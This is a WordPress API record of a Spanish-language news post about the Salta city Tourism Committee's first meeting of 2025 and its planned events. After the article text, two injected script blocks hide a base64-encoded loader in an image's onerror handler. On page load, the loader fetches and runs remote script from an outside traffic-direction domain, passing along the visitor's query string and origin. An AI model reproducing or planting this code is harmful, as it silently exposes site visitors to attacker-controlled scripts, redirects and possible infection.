{"id":4782,"date":"2025-01-29T09:38:55","date_gmt":"2025-01-29T12:38:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4782"},"modified":"2025-08-13T23:41:41","modified_gmt":"2025-08-14T02:41:41","slug":"el-comite-de-turismo-realizo-su-primera-reunion-del-ano","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4782","title":{"rendered":"Ciudad de Salta: El Comit\u00e9 de Turismo realiz\u00f3 su primera reuni\u00f3n del a\u00f1o"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-86ca8fdc2653dee24be679775102e2b3\" style=\"background-color:#0878b8\"><strong><em>Se analiz\u00f3 el primer mes 2025 y se presentaron las actividades para febrero, marzo y abril. Entre ellas se destacan, los Corsos, el D\u00eda de los Enamorados, D\u00eda Mundial de la Pizza, Media Marat\u00f3n de Salta, entre otros.<\/em><\/strong><\/h4>\n\n\n\n<p>Este martes, se llev\u00f3 a cabo el encuentro del Comit\u00e9 de Turismo de la ciudad de Salta, donde se reunieron las autoridades del Ente de Turismo municipal y los representantes de las c\u00e1maras y asociaciones del sector privado.<\/p>\n\n\n\n<p>Tuvo lugar en la pizzer\u00eda c\u00e9ntrica, Kentucky, donde se present\u00f3 el plan de trabajo para el a\u00f1o 2025 abarcando cuatro ejes de trabajo: Observatorio Tur\u00edstico, Desarrollo Tur\u00edstico, Calidad y Capacitaci\u00f3n y Promoci\u00f3n Tur\u00edstica.<\/p>\n\n\n\n<p>Entre los temas presentados se destacan la continuidad de los programas: Brigada de Anfitriones, Expertos en Salta, Yo Anfitri\u00f3n y trabajar de manera conjunta en un plan de capacitaci\u00f3n que refuerce la prestaci\u00f3n de servicios en el destino.<\/p>\n\n\n\n<p>Tambi\u00e9n, potenciar la implementaci\u00f3n de los sellos Salta Ciudad que, en sus formatos Amigable y Accesible, tuvo 50 empresas participantes y m\u00e1s de 270 personas sensibilizadas y; en lo que se refiere al sello Sustentable ampliar su implementaci\u00f3n a la gastronom\u00eda en un trabajo conjunto con la C\u00e1mara Hotelera Gastron\u00f3mica y Afines.<\/p>\n\n\n\n<p>As\u00ed mismo, se present\u00f3 el calendario de eventos locales y acciones de promoci\u00f3n en los principales mercados, destac\u00e1ndose que, en el d\u00eda de ma\u00f1ana se inicia la acci\u00f3n de promoci\u00f3n previa al carnaval en los mercados regionales y el compromiso de estar presentes en los principales eventos de promoci\u00f3n tur\u00edstica a lo largo del a\u00f1o.<\/p>\n\n\n\n<p>A lo largo del encuentro, se dialog\u00f3 sobre las actividades que se desarrollan durante los pr\u00f3ximos meses, alguna de las destacadas, en febrero son: los Corsos; el s\u00e1bado 8 de febrero un especial del programa \u201cConociendo mi Ciudad\u201d, dedicado al Natalicio de G\u00fcemes; el domingo 9 de febrero, D\u00eda Mundial de la Pizza, motivo por el cual durante los d\u00edas previos se realizar\u00e1 un concurso a trav\u00e9s de redes sociales para que el p\u00fablico pueda elegir a la \u201cMejor pizzer\u00eda de Salta 2025\u201d. Tambi\u00e9n se conmemorar\u00e1 el d\u00eda de la Batalla de Salta.<\/p>\n\n\n\n<p>Adem\u00e1s, con motivo del d\u00eda de los enamorados, el fin de semana perteneciente al 14 de febrero, se realizar\u00e1 \u201cSalta el Amor\u201d, con el objetivo de promover las escapadas rom\u00e1nticas y las actividades en pareja.<\/p>\n\n\n\n<p>En marzo las actividades destacadas son: el Desentierro del Carnaval el domingo 2 de marzo y el encuentro de brujos el lunes 3 de marzo; como as\u00ed tambi\u00e9n el D\u00eda de la Mujer, San Patricio, sumando el fin de semana largo por el \u201cD\u00eda de la Memoria Verdad y Justicia\u201d. Cerrando el mes de marzo con la Media Marat\u00f3n de la ciudad de Salta el 30 de marzo.<\/p>\n\n\n\n<p>Adem\u00e1s, se hizo hincapi\u00e9 en el plan de acciones, englobado en formaciones, capacitaciones y la sensibilizaci\u00f3n para recibir al turista que visita la ciudad. A su vez, se trataron las proyecciones relacionadas a las promociones y los sellos de calidad, en cuanto a los servicios y hoteler\u00eda. Hoteles m\u00e1s verdes, sustentables, accesibles, amigables y responsables.<\/p>\n\n\n\n<p>Juan Chiban, presidente de la C\u00e1mara Hotelera y Gastron\u00f3mica se refiri\u00f3 a la reuni\u00f3n y dijo: \u201cEn este encuentro delineamos los objetivos del 2025 y las acciones que vamos a realizar en conjunto, venimos trabajando muy bien con la Municipalidad, mancomunadamente y esperamos que este a\u00f1o siga siendo as\u00ed\u201d.<\/p>\n\n\n\n<p>Fernando Garcia Soria, coordinador del Ente de Turismo, expres\u00f3 que este a\u00f1o representa muchos desaf\u00edos para la actividad, es por lo que es clave planificar las acciones con tiempo y tener una hoja de ruta que permita al sector optimizar recursos para buscar resultados, dijo tambi\u00e9n: \u201cEl turismo es una prioridad para el municipio y tenemos la instrucci\u00f3n y el apoyo del intendente, Emiliano Durand, para trabaja en fortalecerlo, esto lo vamos a hacer de manera conjunta con el ministerio y todo el sector privado\u201d.<\/p>\n\n\n\n<p>Participaron de la reuni\u00f3n: Fernando Garcia Soria, coordinador del Ente de Turismo Municipal; Juan Chiban presidente de la C\u00e1mara Hotelera y Gastron\u00f3mica de la provincia de Salta; Mariana Farjat, presidenta de la Asociaci\u00f3n de AHT Filial Salta; Karen Chamon en representaci\u00f3n de ASAT; Daniel Astorga presidente del Salta Convention Bureau; Juan Manuel Contreras, subsecretario de Promoci\u00f3n Tur\u00edstica y; Julieta Del Carpio, subsecretaria de Desarrollo Tur\u00edstico.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"4783\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0675-1024x768-1.webp\" alt=\"\" class=\"wp-image-4783\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0675-1024x768-1.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0675-1024x768-1-300x225.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0675-1024x768-1-768x576.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0675-1024x768-1-560x420.webp 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0675-1024x768-1-80x60.webp 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0675-1024x768-1-696x522.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0675-1024x768-1-265x198.webp 265w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"4784\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0683-scaled-1-1024x768.webp\" alt=\"\" class=\"wp-image-4784\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0683-scaled-1-1024x768.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0683-scaled-1-300x225.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0683-scaled-1-768x576.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0683-scaled-1-1536x1152.webp 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0683-scaled-1-2048x1536.webp 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0683-scaled-1-560x420.webp 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0683-scaled-1-80x60.webp 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0683-scaled-1-696x522.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0683-scaled-1-1068x801.webp 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0683-scaled-1-1920x1440.webp 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0683-scaled-1-265x198.webp 265w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"4785\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0686-scaled-1-1024x768.webp\" alt=\"\" class=\"wp-image-4785\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0686-scaled-1-1024x768.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0686-scaled-1-300x225.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0686-scaled-1-768x576.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0686-scaled-1-1536x1152.webp 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0686-scaled-1-2048x1536.webp 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0686-scaled-1-560x420.webp 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0686-scaled-1-80x60.webp 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0686-scaled-1-696x522.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0686-scaled-1-1068x801.webp 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0686-scaled-1-1920x1440.webp 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/img-0686-scaled-1-265x198.webp 265w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/prensa.municipalidadsalta.gob.ar\/el-comite-de-turismo-realizo-su-primera-reunion-del-ano\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2022\/03\/logo-salta-2024-jpg.webp\" alt=\"\" style=\"width:236px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se analiz\u00f3 el primer mes 2025 y se presentaron las actividades para febrero, marzo y abril. Entre ellas se destacan, los Corsos, el D\u00eda de los Enamorados, D\u00eda Mundial de la Pizza, Media Marat\u00f3n de Salta, entre otros. Este martes, se llev\u00f3 a cabo el encuentro del Comit\u00e9 de Turismo de la ciudad de Salta, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4785,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,11,15],"tags":[],"class_list":{"0":"post-4782","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-datos-utiles","9":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4782"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4782"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4782\/revisions"}],"predecessor-version":[{"id":6585,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4782\/revisions\/6585"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4785"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4782"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4782"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4782"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}